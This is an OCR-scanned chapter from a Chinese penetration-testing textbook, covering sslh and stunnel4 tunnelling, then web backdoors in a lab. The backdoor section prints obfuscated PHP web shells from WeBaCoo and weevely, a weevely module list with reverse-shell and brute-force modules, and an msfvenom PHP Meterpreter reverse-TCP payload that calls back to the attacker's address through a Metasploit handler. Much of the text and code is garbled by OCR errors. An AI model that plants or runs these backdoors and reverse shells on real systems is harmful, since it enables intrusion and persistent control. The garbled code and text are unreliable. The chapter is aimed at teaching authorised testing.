目前 ，ssjh 可 调度 HTTP、HTTPS、SSH、OpenVN 、tinc 和 XMPP 协 
议 的 连接 。 

测试 人 员 通 常会 访问 远程 服务 名 的 HTTP ^ HTTPS ^ SSH ^ 
OpenVPN 和 其 他 协议 。 但 是 被 测 目 标的 服务 提供 商 可 能 会 只 开放 80 

(http) 端口 和 443 (https) 端口 ， 屏 蔽 相应 的 服务 端口 。 怎 么 穿越 这 

种 防火 墙 呢 ? 

sslh 程序 可 以 突破 这 些 障碍 。sslh 程序 的 端口 复 用 功能 可 在 443 端 
口上 同时 受理 SSH 连 接 和 HTTPS 连 接 。 

如 需 启 动 sh 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 

# sslh 


上 述 指 令 将 在 屏幕 上 显示 程序 的 使 用 方法 。 

在 使 用 sslh 程 序 之 前 ， 要 对 Web 服 务 器 端 程序 进行 调整 。 您 首先 要 
编辑 服务 器 程序 的 配置 文件 ， 使 其 仅 监听 本 机 (localhost) 的 443 端 
口 。 然 后 重 局 web 服务 响 端 程序 。 在 Kali Linux 系统 里 ， 您 需要 编 
辑 /etc/apache2/ 目 录 下 的 ports.conf 文件 ， 修 改 mod_ssl 部 分 的 有 关 设 
He 

在 配置 文件 中 找到 以 下 内 容 。 

«IfModule mod_ssl.c> 

Listen 443 

</IfModule> 

把 它 修改 为 : 

«IfModule mod_ssl.c> 

Listen 127.0.0.1:443 

</IModule> 

接 下 来 配置 sslh。 打 开 文 件 /etc/default/sslh， 并 找到 下 列 内 容 。 

Run=no 

把 上 述 内 容 伏 换 为 : 

Run-yes 


在 我 的 主机 上 ， 这 个 文件 的 内 容 如 图 11.16 所 示 。 


3t t 


Default options for sslh initscript 
sourced by /etc/init.d/sslh 


Disabled by default, to force yourself 

to read the configuration: 

- /usr/share/doc/sslh/README.Debian (quick start) 

- /usr/share/doc/sslh/README, at "Configuration" section 
- sslh(8) via "man sslh" for more configuration details. 
Once configuration ready, you *must* set RUN to yes here 
and try to start sslh (standalone mode only) 


te te dk di He He 


RUN=yes 


# binary to use: forked (sslh) or single-thread (sslh-select) version 
DAEMON-/usr/sbin/sslh 


DAEMON_OPTS="--user sslh --listen 0.0.0.0:443 --ssh 127.0.0.1:22 --ssl 127.0.0.1 
:443 --pidfile /var/run/sslh/sslh.pid" 


图 11.16 


保存 文件 并 启动 sslh 服 务 。 

# /etc/init.d/sslh start 

[ ok ] Starting ssl/ssh multiplexer: sslh. 

此 外 ， 我 们 可 通过 下 述 指 令 检查 sslh 程 序 是 否 在 正常 运行 。 
ps -ef | grep sslh 

上 述 指令 的 运行 结 采 如 图 11.17 所 示 。 


root@kali:~# ps -ef | grep sslh 

SSLh 3531 1 98 15:32 ? 00:00:00 /usr/sbin/sslh --user sslh --1 
mn 0.0.0.0 443 --ssh 127.0.0.1 22 --ssl 127.0.0.1 443 --pidfile /var/run/ss 
h/sslh.pid 

SSLh 3534 3531 0 15:32 ? 00:00:00 /usr/sbin/sslh --user sslh --1 
m 0.0.0.0 443 --ssh 127.0.0.1 22 --ssl 127.0.0.1 443 --pidfile /var/run/ss 
h/sslh.pid 

root 3563 3399 0 15:33 pts/0 00:00:00 grep sslh 


图 11.17 


上 述 信 息 表 明 sslh 运 行 正 常 。 

然后 ， 我 们 使 用 另 一 台 主 机 通过 443 端 口 连接 到 被 测 主机 的 SSH 服 
Ze. o 
为 

ssh -p 443 root@192.168.2.22 

上 述 指令 的 运行 结 采 如 图 11.18 所 示 。 


The authenticity of host '[192.168.2.22]:443 ([192.168.2.22]:443)' can't be established. 
ECDSA key fingerprint is b0:c2:8d:54:83:68:d7:3e:09:14:00:62:9d:5a:d6:67. 

Are you sure you want to continue connecting (yes/no)? yes 

Warning: Permanently added '[192.168.2.22]:443' (ECDSA) to the list of known hosts. 
root@192.168.2.22's password: 

Linux kali 3.7-trunk-amd64 #1 SMP Debian 3.7.2-0*kali8 x86 64 


The programs included with the Kali GNU/Linux system are free software; 
the exact distribution terms for each program are described in the 
individual files in /usr/share/doc/*/copyright. 


Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent 
permitted by applicable law. 
rootékali:-4 J 


图 11.18 
上 述 信 息 表 明 ， 我 们 能 够 通过 443 端口 连接 到 Kali Linux 主机 的 
SSH 服务 。 


11.2.8 stunnel4 


stunnel4 可 以 使 用 SSL 技术 对 客户 端 和 服务 器 端 之 间 的 TCP 会 话 
进行 加 密 传输 。stunnel4 可 以 为 本 身 无 法 进行 TLS 或 SSL 通信 的 客户 端 
及 服务 器 程序 提供 安全 的 加 密 连 接 ， 而 不 必修 改 这 些 程 序 的 源 代 码 。 
它 可 以 封装 samba、POP3、IMAP、SMTP 和 HTTP 协 议 。 

如 需 启动 stunnel4 程 序 ， 可 在 终端 中 使 用 下 壕 指令 。 

# stunnel4 -h 

上 述 指 令 将 在 屏幕 上 显示 程序 的 使 用 方法 。 

如 需 查 看 帮助 配置 文件 ， 可 以 指定 -help 选 项 。 

# stunnel4 -help 

上 述 指 令 将 在 屏幕 上 显示 程序 的 帮助 配置 文件 。 

本 文 将 演示 使 用 stunnel4 加 密 MySQL 连 接 的 具体 方法 。 以 此 为 基 
础 ， 您 可 以 举一反三 地 使 用 stunnel 程 序 对 其 他 网 络 服务 的 连接 进行 SSL 
BUR o 

假设 服务 端 主 机 的 耳 地址 是 192.168.2.21 客 户 端 主机 的 卫 地 址 是 
192.168.2.22 ° 


首先 要 调整 服务 端 主机 的 相应 配置 。 
1. 创建 SSL 证 书 和 密 钥 。 
# openssl req -new —days 365 -nodes -x509 -out /etc/stunnel/ 


stunnel.pem -keyout /etc/stunnel/stunnel.pem 


2. 依照 程序 的 提示 ， 依 次 设置 国 别 、 省 份 、 通 用 名 和 E-mail 地 址 


的 信息 。 


3. 之 后 ，OpenSSL 程序 会 制作 SSL WEP ° SSL 密 钥 和 证 书信 息 将 


会 保存 为 /etc/stunnel/ stunnel.pem ° 


4. 调整 stunnel4 的 配置 文件 ， 使 其 在 3307 端 口上 提供 安全 连接 ， 
并 将 解密 后 的 数据 包 转 发 给 本 机 真正 的 MySQL 服务 器 端 程序 ， 即 将 下 


述 配置 信息 保存 为 配置 文件 /etc/stunnel/stunnel.conf ° 
cert = /etc/stunnel/stunnel.pem 
setuid = stunnel4 
setgid = stunnel4 
pid = /var/run/stunnelA/stunnel4.pid 
[mysqls] 
accept = 0.0.0.0:3307 
connect = localhost:3306 
5. 修改 文件 /etc/default/stunnel4， 使 其 可 以 自动 启动 。 
ENABLED-1 
6. 局 动 stunnel4 服 务 。 
#/etc/init.d/stunnel4 start 
Starting SSL tunnels: [Started: /etc/stunnel/stunnel.conf] stunnel. 
7. 检查 stunnel4 十 否 监听 了 3307 端 口 。 
# netstat -nap | grep 3307 
8. 上 述 指 令 的 运行 结果 如 下 。 
tcp 0 00.0.0.0:3307 0.0.0.0:* 


LISTEN 8038/stunnel4 
9. EWS ARH, stunnel4 L EIE ° 
es 按照 以 下 步骤 配置 客户 端 主机 。 
调整 stunnel4 的 配置 文件 ， 使 其 在 3306 端 口上 受理 MySQL 客 户 
cm 并 将 这 个 连接 转发 给 远 端 stunnel 服 务 端 主机 的 3307 端 口 。 
将 下 述 配置 信息 保存 为 配置 文件 /etc/stunnel/stunnel.conf 。 


client = yes 


[mysqls] 

accept = 3306 

connect = 192.168.2.21:3307 
2. 修改 文件 /etc/defaulystunnel4， 使 其 可 以 目 动 局 动 。 
ENABLED=1 
3. 局 动 stunnel4 服 务 。 
#/etc/init.d/stunnel4 start 
使 用 下 述 指令 查看 stunnel4 服 务 的 运行 状态 是 否 正常 。 
netstat -napt | grep stunnel4 
在 我 们 的 演示 系统 上 ， 上 壕 指 令 的 输出 结果 如 下 。 
tcp 000.0.0.0:3306 0.0.0.0:* 
LISTEN 2860/stunnel4 

ia Pts 3834 stunnel Al ase 2£MySQL BR ÍS ae ° 

pase -u root -h 127.0.0.1 
上 述 指令 的 运行 结果 如 图 11.19 所 示 。 


root@kali:~# mysql -u root -h 127.0.0.1 

eg: to the MySQL monitor. Commands end with ; or \g. 
our MySQL connection id is 37 

Server version: 5.5.32-O0ubuntu0.12.04.1 (Ubuntu) 


Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved. 
Oracle is a registered trademark of Oracle Corporation and/or its 
affiliates. Other names may be trademarks of their respective 


owners. 


Type 'help;' or '\h' for help. Type '*c' to clear the current input statement. 


mysql> 


图 11.19 
5. 而 后 ， 打 开 Wireshark 程 序 ， 再 在 MySQL 客 户 端 里 执行 下 述 指 


show databases; 


在 Wireshark 里 ， 我 们 只 能 看 到 图 11.20 所 示 的 数据 。 
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此 时 已 经 使 用 SSL 技 术 对 程序 的 连接 进行 了 加 密 ， 所 以 我 们 无 法 看 
到 任何 明文 。 


相 比 之 下 ， 如 果 不 使 用 stunnel 程序 加 密 网 络 数据 ， 那 么 在 进行 相 
同 数据 库 查 询 时 ， WireShark 束 能 够 截获 出 数据 库 数据 的 明文 ( 见 图 
11.21) 。 


I 
5. 5. 32-GühuntüG: IZ; GATT Gs. sui" EL I III TI EE enr. RE* ss R: j *00" Uh 
rz0.mysql native | password. < ~ es root..mysql_native_passwor 
| !....select @@version comment limit 
Le aie dar... emvaraidn cummenE. 有 于 AU TO RP SISSE, show 
batabases 了 K....def.information schema.SCHEMATA. SCHEMATA. Database. SCHEMA NAM 
Sl Serene. i een less information schema.....mysql.....performance schema.....tes 
| xt 


图 11.21 


在 网 络 里 进行 监听 可 发 现 大 量 信息 ， 收 集 数 据 库 软 件 名 称 和 软件 
版 本 号 码 、 操 作 系 统 、 数 据 库 的 登录 用 户 名 和 密码 ， 以 及 数据 库 里 的 
库 名 等 敏感 信息 。 


11.3 创建 Web 后 门 


下 文 将 介绍 多 球 Web 后 门 工 具 ， 这 类 工具 通常 用 于 维护 控制 权 。 

需要 指出 的 是 ，IDS、 RA Qe i 能 会 检测 出 这 些 后 
门 。 如 果 对 后 门 的 隐匿 性 有 较 高 要 求 ， 您 需要 创建 自己 专用 的 后 门 程 
序 o 

在 本 市 的 演示 过 程 中 ， 各 主机 和 IP 地 址 的 对 应 关系 如 下 : 

e 攻击 人 员 的 主机 使 用 的 IP 是 192.168.2.22; 

e 目标 主机 的 IP 地 址 是 192.168.2.23。 


11.3.1 WeBaCoo 


WeBaCoo (Web Backdoor Cookie) 是 一 款 隐蔽 的 脚本 类 Web 后 门 
工具 。 借 助 HTTP 协 议 ， 它 可 在 客户 端 和 Web 服 务 右 之 间 实 现 执行 代码 
的 网 页 终端 。 

WeBaCoo 有 两 种 操作 模式 。 


e Generation (生产 线 模式 ) : 指定 -g 选项 可 进入 这 种 模式 。 用 户 
可 在 这 种 模式 下 制作 PHP 代 码 的 payload。 

e Terminal (终端 模式 ) : 指定 -t 选项 可 进入 这 种 模式 。 用 户 可 在 
这 种 模式 下 连接 到 被 测 主机 的 后 门 程序 。 

DOCU Nd Web HK ait 40 4 P? vim Z. [8] JR fei EIN 
是 Cookie。 这 就 意味 着 多 数 的 杀毒 软件 、 网 络 入 侵 检 测 / 防 御 系 统 、 网 
络 防火 墙 和 应 用 程序 防火 墙 都 无 法 检测 到 后 门 的 存在 。 

在 WeBaCoo 的 HTTP Cookie 中 ， 以 下 三 个 参数 的 作用 最 为 重要 。 

e cm: 以 Base64 编码 的 shell 指令 

ecn: 加 载 着 编码 后 输出 内 容 的 Cookie 名 称 。 

e cp: 封装 编码 后 输出 内 容 的 分 隔 符 。 

如 需 启动 WeBaCoo 程 序 ， 可 在 终端 中 执行 下 述 指令 

# webacoo -h 


上 上述 指令 将 会 显示 程序 的 使 用 说 明 。 本 文 首先 介绍 制作 后 门 的 具 


体 方法 。 
" x SHE D Y pau A AN 
与 生成 模式 有 关 的 命令 行 选项 如 下 。 
编号 选项 描述 
l -g 制作 后 门 代码 
2 - 工 功 能 后 门 所 需 的 PHP 功能 : 
e system(default) 
e shell exec 
@ exec 
© passthru 
e popen 
3 -o 输出 指定 生成 的 后 门 程序 的 文件 名 


如 果 要 用 默认 的 设置 ， 生 成 名 为 test.php 的 PHP 后 门 程序 ， 并 使 用 
WeBaCoo 的 代码 混淆 技术 对 后 门 进 行 处 理 ， 那 么 可 以 使 用 下 述 指 令 

# webacoo -g -o test.php 

上 上述 指令 的 运行 结果 如 下 。 

WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit 


Copyright (C) 2011-2012 Anestis Bechtsoudis 
{@anestisb | anestis@bechtsoudis.com | http(s)://bechtsou dis .com } 
[+] Backdoor file "test.php" created. 


文件 test.php 的 内 容 如 图 11.22 所 示 


?php $bsstrrev("edoced 4"."6esab");eval($b(str replace(" ","","aWYoaXNzZXQoJF9DTOSLSUVbJ2N 
J1OpKXtvYl9z dG FydCgp S5c3RULBDSHLYXNINjJRFZGVjJjobB2RUKCREIFQO9PSOG 
FWydjbSddKS4nIDI+JjEnKTtzZxRjo29rawVoJFIODTOOLSUVbBI2NUIIOSJ 
9DTOS9SLSUVbJ2NwJI1QuYmFzzTYOX2VuY29kZzShvvYil9nzxRfÉY29SudGVudHMo 
SkuJF9DTOS9SLSUVbJ2NwJ10pO029iX2VuzF9jbGVhbigpoOo380s5")); ?> 


而 后 ， 把 这 个 文件 上 传 到 被 测 主机 (192.168.2.23) ° 
接 下 来 就 可 以 使 用 以 下 指令 连接 到 被 测 主 机 的 后 门 程序 。 
# webacoo -t -u http://192.168.2.23/test.php 

这 样 就 可 以 连接 到 主机 上 的 Web shell ( 见 图 11.23) ° 


WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit 
@anestist anestis@bechtsoudis.com http(s) ://bechtsoudis.con 


[+] Connecting to remote server as... 
uid-33(www-data) gid=33(www-data) groups=33(www-data) 


[*] Type 'load' to use an extension module. 
[*] Type ':«cmd»' to run local OS commands. 
[*] Type 'exit' to quit terminal. 


Jeba« 00$ id 

pr dated gid=33(www-data) groups=33(www-data) 

4ebacoo$ uname -a 

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux 
Nebat 00$ ii 


11.23 


防火 墙 和 代理 服务 器 只 能 够 发 现 客户 端 在 发 送 如 下 请 求 〈 见 图 


11.24) 。 

GET /test.php HTTP/1.1 

Host: 192.168.2.23:80 

Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0.2) Gecko/20100101 Firefox/6.0.2 
Connection: Close 

Cookie: cm2 aWQz ; cnz M-cookie; cp=8zM$ 


图 11.24 


服务 端的 响应 信息 如 下 〈 见 图 11.25) 。 


HTTP/1.1 200 OK 

Date: Sun, 15 Sep 2013 16:41:21 GMT 

Server: Apache/2.2.8 (Ubuntu) DAV/2 

X-Powered-By: PHP/5.2.4-2ubuntuS.10 

Set-Cookie: M-cookie- 82M9624dWIkPTMzKHd3dylkYxRhKSBnawQ9MzMod3d3LWRhdGEplGdyb3Vwcz0zMyh3d3ct Z GFOYSkK82M9624 
Content-Length: 0 

Connection: close 

Content-Type: text/html 


图 11.25 
上 述 HTTP 请 求 和 回复 信息 表明 ，WeBaCoo 后 门 的 客户 并 和 服务 
事端 的 通信 是 不 易 发 现 的 加 窗 会 话 。 它 所 用 的 混 消 技术 降低 了 它 被 发 
觉 的 可 能 性 。 
退出 WeBaCoo 终 端 模式 的 指令 是 exit 。 


11.3.2 weevely 


weevely 是 一 鞭 具 有 高 隐蔽 性 的 针对 PHP 平台 的 Web shell。 它 实现 
了 SSH 风格 的 终端 界面 ， 并 有 大 量 自动 化 的 模块 。 测 试 人 员 可 用 它 执 
行 系统 指令 、 远 程 管理 和 渗透 后 期 的 目 动 渗透 。 

下 面 是 weevely 的 主要 功能 (https://github.com/epinna/Weevely) ° 

e 它 有 30 多 种 可 完成 目 动 管理 渗透 后 期 任务 的 功能 模块 。 这 些 模 


o 执行 命令 和 浏 贤 远 程 文件 系统 ; 

o 检测 第 见 的 服务 袁 配 置 问题 ; 

o 创造 TCP shell 和 reverse shell; 

o 在 被 测 主机 上 安装 HTTP 代 理 ; 

o 利用 目标 主机 进行 端口 扫 摘 。 

e 使 用 HTTP Cookie 作为 后 门 通信 的 载体 。 


e 文 持 密 码 认证 。 
如 需 启动 weevely 程 序 ， 可 在 终端 中 使 用 下 壕 指令 。 
# weevely 


上 述 指 令 将 会 在 屏幕 上 显示 程序 的 使 用 说 明 。 
weeavely 的 主要 用 途 是 : 


e 生成 混 消 PHP backdoor; 

e 在 图 像 文件 中 追加 多 态 的 后 门 程序 ， 并 可 通过 .htaccess 文件 赋予 
图 像 文件 执行 权限 ; 

e 生成 后 门 .htaccess 文件 。 

e 可 通过 help 选项 列 出 程序 的 全 部 模块 和 生成 工具 。 

# weevely help 

FAZJHE By ^EBGRJSPHP backdoor， 并 将 后 门 保存 为 display.php 。 

# weevely generate password display.php 


[generate.php] Backdoor file 'display.php' created with password 


了 password 
上 壕 指令 生成 的 display.php 的 内 容 如 图 11.26 所 示 。 
?php 
$usoa = str replace("u","","usturu Urueupluaucue"); 


$taof-"JGM9J2Nvdw5GJzskYTOKXOGNt ePTOt JRTtpZihyZXNldCt egkYSk9PSdwYStecgJteiYgJGMoJGEpP j M" ; 
$zddj -"peyRrPSdzc3dvcmQn02V j aG8gJzwnLteiRrLic-*JztltedmFsKGJtehc2U2NF9kZWteNvZteGUteocHJlZ19teyZXBsYt 
e"; 


$ijiu-"WNlKGteFycmF5KCcvWtel5cdzlcclOvJywnLlxzLytecpLCBhtecnJheSgnteJywnKycpLCBqb2t elu"; 
$zkbj-2"KGteFytecmFte5teX3NsaWNlteKteCRhLCRj KCRhKSOzKStekpKSk7ZWNotebteyAnPCBnLiRrLic*Jztet9"; 
$txal = $usoa("x", "", "bxaxsex6x4 xdexcxoxde"); 

$dvkx = $usoa("fj","","crfjefjatfjefj fjffjunfjcfjtfjiofjn"); 

$qoaq = $dvkx('', $txal($usoa("te", "", $taof.$zddj .$ijiu.$zkbj))); $qoaq(); 


图 11.26 
然后 通过 正常 的 途径 或 利用 程序 的 漏洞 ， 把 后 门 文件 上 传 到 目标 


然后 使 用 下 述 命 令 访问 被 测 主机 (192.168.2.23) 的 Web shell 。 

# weevely http://192.168.2.23/display.php password 

只 要 连接 成 功 ， 您 就 能 连接 到 weevely 的 Web shell 上 。 为 了 检测 功 
能 是 否 正 常 ， 我 们 可 在 Web shell 中 执行 .net.ifaces 指令 以 获取 远程 主机 
的 网 络 接口 信息 。 另 外 ， 我 们 还 可 以 运行 id 指令 查看 当前 用 户 的 ID C 
图 11.27) 。 


root@kali:~# weevely http://192.168.2.23/display.php password 


Stealth tiny web shell 


[*] Welcome to Weevely. Browse filesystem and execute system commands. 
[*] Use ':help' to list available modules and run selected one. 


[shell.php] [!] Error: No response 
msfadminQ:/var/www $ :net.ifaces 


| lo | 127.0.0.1/8 
| ethO | 192.168.2.23/24 | 


msfadminQ:/var/www $ id 
uid-33(www-data) gid-33(www-data) groups-33(www-data) 
msfadminQ:/var/www $ lj 


图 11.27 

上 述 信 息 表 明 ， 我 们 成 功 地 连接 到 被 测 主机 的 Web shell。 在 此 shell 

上 ， 您 可 以 在 远程 主机 上 执行 其 他 命令 。 例 如 ， 您 可 通过 :help 指 令 查 
看 weevely 支 持 的 各 种 指令 ( 见 图 11.28) ° 


| module description | 
上 

:audit.userfiles 
:audit.etcpasswd 
:audit .mapwebfiles 
:shell.php 

:shell.sh 
:System.info 
:backdoor.tcp 
:backdoor.reversetcp 
:bruteforce.sql 


| 

+ 

| Enumerate common users restricted files 

| Enumerate users and /etc/passwd content 

| Enumerate webroot files properties 

| PHP shell 

| System shell 

| Collect system informations 

| Open a shell on TCP port 

| Send reverse TCP shell 

| Bruteforce SQL username 

:bruteforce.sqlusers | Bruteforce all SQL users 

:file.upload | Upload binary/ascii file to the target filesystem 

:file.rm | Remove remote files and folders 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
+ 


:file.upload2web Upload binary/ascii file into web folders and guess corresponding url 


:file.download Download binary/ascii files from target filesystem 


| | 
| | 
| | 
| | 
| | 
| | 
| | 
| | 
| | 
| | 
| | 
| :file.enum Check remote files type, md5 and permission | 
| | 
| | 
| | 
| | 
| | 
| | 
| | 
| | 
| | 
| | 
| | 
| | 


:file.check Check remote files type, md5 and permission 

:file.read Read files from target filesystem 

:sql .console Execute SQL queries 

:sql .dump Get SQL database dump 

:Net .proxy Install and run Proxy to tunnel traffic through target 
:Net .phpproxy Install remote PHP proxy 

:net.ifaces Print interface addresses 

inet .Scan Print interface addresses 

:find.suidsgid Find files with superuser flags 

:find.perms Find files with write, read, execute permissions 


图 11.28 

例如 ， 我 们 可 以 使 用 下 述 指令 扫描 被 测 主 机 的 22 痉 口 。 

msfadmin@:/var/www $ :net.scan 192.168.2.23 22 

SCAN 192.168.2.23:22-22 OPEN: 192.168.2.23:22 

tH ap DAA sel ELS A Aom A e 

msfadmin@:/var/www § :net.scan 192.168.2.23 80 

SCAN 192.168.2.23:80-80 OPEN: 192.168.2.23:80 

您 可 随时 使 用 组 合 键 Ctrl+C 退出 weevely shell ° 

weevely 程 序 只 能 制作 PHP 脚本 的 Web shell, ， 如 需 创 建 其 他 脚本 的 
Web shell, ， 可 考虑 Laudanum (http://laudanum.inguardians. com/) ° 
Laudanum 除 了 具备 Web shell 的 功能 之 外 ， 还 有 DNS 查询 、 获 取 LDAP 信 
息 等 其 他 功能 。 它 支持 ASP、ASPX、CFM、JSP 和 PHP 脚 本 。 


11.3.3 PHP Meterpreter 


Metasploit 有 一 个 名 为 PHP Meterpreter 的 payload。 这 个 模块 可 以 创 
建 具有 Meterpreter 功 能 的 PHP Web shell。 利 用 目标 的 漏洞 (诸如 常见 的 
注入 和 上 传 漏洞 ) 之后， 再 把 它 的 shell 传 到 目标 主机 即 可 。 

Metasploit 的 msfvenom 工具 可 以 制作 PHP meterpreter， 具 体 指 令 如 
Te 

msfvenom -p php/meterpreter/reverse tcp LHOST=192.168.2.23 -f raw 


php-meter.php 

上 述 指 令 各 选项 的 作用 如 下 。 

e-p: 指定 payload 为 php/meterpreter/reverse_tcp。 
e-f: 设置 输出 格式 (raw) 。 

eLHOST: 设 定 目标 主机 的 也 地址 。 


Metasploit 会 把 生成 的 PHP meterpreter 保存 为 文件 php-mterphp。 这 
个 文件 的 部 分 内 容 如 图 11.29 所 示 。 
#<?php <= 


error reporting(0); 

## The payload handler overwrites this with the correct LHOST before sending 
# it to the victim. 

$ip = '192.168.2.22'; 

$port = 4444; 

$ipf - AF INET; 


if (FALSE !== strpos($ip, ":")) ( 
# ipv6 requires brackets around the address 
$ip 二 "re. $ip Pad Na 
$ipf = AF INET6; 

) 


if (($f = 'stream socket client') && is callable($f)) ( 
$s = $f("tcp://($ip):($port) ") ; 
$s type = 'stream'; 

} elseif (($f = 'fsockopen') && is callable($f)) ( 
$s = $f($ip, $port); 


图 11.29 

如 图 11.29 所 示 ， 在 上 传 后 门 到 被 测 主 机 之 前 ， 首 先 要 删除 脚本 第 
一 行 的 注释 。 

其 次 ， 我 们 还 要 在 攻击 主机 上 作 好 受理 PHP Meterpreter 的 准备 。 
ft Kali 的 主机 上 启动 Metasploit Console (msfconsole) ， 并 启动 
multi/handler exploit 。 然 后 指定 制作 shell 后 门 时 用 过 的 
php/meterpreter/reverse tcp payload。 接 下 来 把 变量 LHOST 设 置 为 Kali 
主机 的 IP 地 址 。 在 此 之 后 ， 使 用 exploit 指令 运行 exploit 的 受理 程序 


(handler) 。 上 壕 指令 的 运行 结果 如 图 11.30 所 示 。 
msf> use exploit/multi/handler 
msf exploit(handler) > set payload php/meterpreter/reverse tcp 
payload => php/meterpreter/reverse tcp 
msf exploit(handler) > set LHOST 192.168.2.22 
LHOST => 192.168.2.22 
msf exploit(handler) > exploit 


[*] Started reverse handler on 192.168.2.22:4444 
[*] Starting the payload handler... 


图 11.30 
在 利用 注入 或 者 远程 文件 包含 漏洞 等 web 漏洞 之 后 ， 把 Web shell 
上 传 到 目标 服务 器 。 此 后 ， 您 就 可 以 通过 Web 浏 览 器 访问 shell ( 见 图 
11.31) » 
(* Connecting... 


Warning: Never expose this VM to an untrusted network! 


Contact: msfdev[at]metasploit.com 


Login with msfadmin/msfadmin to get started 


图 11.31 
在 运行 Kali 的 测试 主机 上 ，Metasploit 程 序 将 会 显示 Meterpreter 会 话 
( 见 图 11.32) ° 


[*] Sending stage (39848 bytes) to 192.168.2.23 
[*] Meterpreter session 1 opened (192.168.2.22:4444 -> 192.168.2.23:49372) at 2013-12-25 21:57:27 «0700 


meterpreter > sysinfo 
Computer : metasploitable 
os : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:06 UTC 2008 i686 
Meterpreter : php/php 
r > getuid 
Server username: www-data (33) 
m reter > 


图 11.32 


此 时 ， 和 您 就 可 以 使 用 sysinfo 和 getuid 之 类 的 Meterpreter 指 令 。 


11.4 总 结 


JU 一 


本 章 通 过 cymothoa、intersect、metsvc 工 具 的 有 关 人 介绍， 讲解 了 后 
门 程序 的 具体 应 用 。 后 门 是 维持 对 目标 主机 控制 权 的 有 效 手段 。 

接 下 来 ， 本 章 介绍 了 隧道 工具 。 隧 道 工 具 可 以 用 某 种 协议 封装 另 
一 种 协议 ， 以 绕 过 目标 系统 上 的 屏蔽 对 外 连接 的 限制 机 制 。 相 关 篇 幅 
介绍 了 dns2tcp ^ iodine ^ ncat ^ proxychains ^ ptunnel ^ socat ^ sslh 和 
stunnel4 的 使 用 方法 。 

最 后 ， 本 章 简 要 介绍 了 制作 Web shell 的 Web 后 门 工具 。 把 Web 
shell 上 传 到 目标 服务 器 之 后 ， 我 们 束 可 以 连接 到 后 门 程序 。 

下 一 章 将 会 讲解 整理 文档 、 书 写 报告 ， 以 及 向 客户 讲解 在 渗透 测 
试 中 发 现 的 安全 隐患 的 有 关 方 法 。 


12 


专业 的 渗透 测试 要 对 评估 结 末 进 行 奶 喀 ， 所 以 渗透 测试 也 要 有 正 
规 的 记录 卷宗 。 把 各 种 测试 工具 的 输入 和 输出 记录 进行 文档 化 管理 ， 
可 保证 评 佑 结 采 的 准确 性 、 一 致 性 和 可 再 现 性 。 渗 透 测 试 这 个 部 分 的 
工作 ， 可 能 会 涉及 疝 客 户 演示 评估 结果 的 工作 。 应 当 严 肃 对 待 这 个 环 
万 的 工作 。 霖 些 客户 都 会 对 已 有 漏洞 进行 缓解 控制 ， 然 后 模拟 测试 人 
员 的 测试 过 程 ， 以 验证 改进 措施 的 有 效 性 ， 男 一 些 客户 可 能 会 通过 合 
同 要 求 测试 人 员 进 行 再 次 测试 ， 以 验证 客户 改进 方案 的 效果 。 使 用 准 
确 的 语言 把 测试 的 各 个 步 又 整理 为 有 关 着 守 ， 有 助 于 您 在 这 个 环 市 中 
进行 相同 的 验证 性 测试 。 


测试 的 卷宗 应 当 记录 下 测试 工作 中 的 全 部 测 话 行 为 。 在 渗透 测试 
的 时 间 窗 口内 ， 万 一 甲 方 的 业务 受到 测试 以 外 的 因素 的 影响 ， 这 些 卷 
宗 将 能 证 明 您 的 测 斌 内容。 虽然 记录 操作 行为 的 这 种 事情 乏味 而 枯 
燥 ， 但 是 专业 的 渗透 测试 人 员 会 非常 注重 这 项 工作 。 

要 精心 准备 涉及 核心 领域 的 文档 、 汇 报 和 现场 演示 ， 广 重 内 容 的 
全 局 性 、 条 理性 和 连贯 性 。 本 章 会 详细 介绍 有 关 工 作 的 要 点 ， 指 导读 
者 通盘 考虑 文档 和 报告 工作 的 集 上 略 。 本 划 将 会 涉及 以 下 主题 。 

e 验证 测试 结 有 末 ， 毕 竟 汇 报 的 内 容 应 当 是 经 过 验证 的 测试 结论 。 

e 渗透 测试 项 目 时 第 涉 及 客户 的 行政 层 、 管 理 层 、 技 术 层 。 不 同 层 
面 的 人 员 对 测试 项 目 有 着 不 同 的 关注 点 。 本 文 将 讨论 分 别 满足 他 们 需 
求 的 报告 类 型 和 报告 结构 。 

e 演示 一 玉 将 介绍 如 何 根据 听众 水 平 准备 适当 的 演示 材料 。 

e 渗透 报告 都 要 有 测试 的 后 期 工作 、 改 正方 法 和 改进 建议 。 这 部 分 
将 帮助 有 关 部 门 进行 整改 。 要 提出 专业 的 整改 意见 ， 就 要 从 安全 的 角 
度 深度 分 析 被 测 单位 的 信息 系统 ， 这 无 疑 是 汇报 人 员工 作 中 的 一 大 难 
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本 章 的 各 个 小 节 均 能 指导 读者 得 当地 准备 文档 ` 汇报 和 演示 工 
作 。 这 些 工 作 的 细微 丝 调 都 可 能 引发 法 律 问题 。 报 告 的 观点 必须 与 测 
试 中 发 现 的 事实 一 至。 而且， 指出 目标 系统 的 潜在 缺陷 只 是 报告 的 基 
本 人 作用， 客户 对 报告 的 期 竺 往往 更 高 。 例 如 ， 客 户 可 能 要 求 报告 内 容 
能 够 以 已 知 的 和 规划 规定 为 出 发 已 ， 通 过 具有 说 服 力 的 证 据 进 行 问题 
演示 。 此 外 ， 还 要 明确 可 用 来 进行 攻击 的 犯罪 手段 、 有 关 工 具 和 技 
术 ， 列 举 已 发 现 的 漏洞 并 验证 利用 漏洞 的 可 行 性 。 大 体 上 说 ， 文 档 报 
告 的 重点 应 当 是 甲 方 的 安全 脆弱 性 ， 而 不 是 乙方 控 据 漏洞 的 具体 过 程 
或 涉及 漏洞 的 扩 术 现象 。 


12.1 文档 记录 与 结果 验证 


在 测试 过 程 中 可 能 会 发 现 很 多 漏洞 ， 但 是 并 非 每 个 调 洞 都 可 被 利 
用 。 要 难 证 漏洞 存在 被 攻击 的 可 能 性 ， 本 质 上 说 融 必 须 对 大 量 的 调 洞 
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形象 的 重要 工作 。 不 少 人 都 会 直接 整 段 复制 扫描 程序 的 扫描 报告 ， 把 
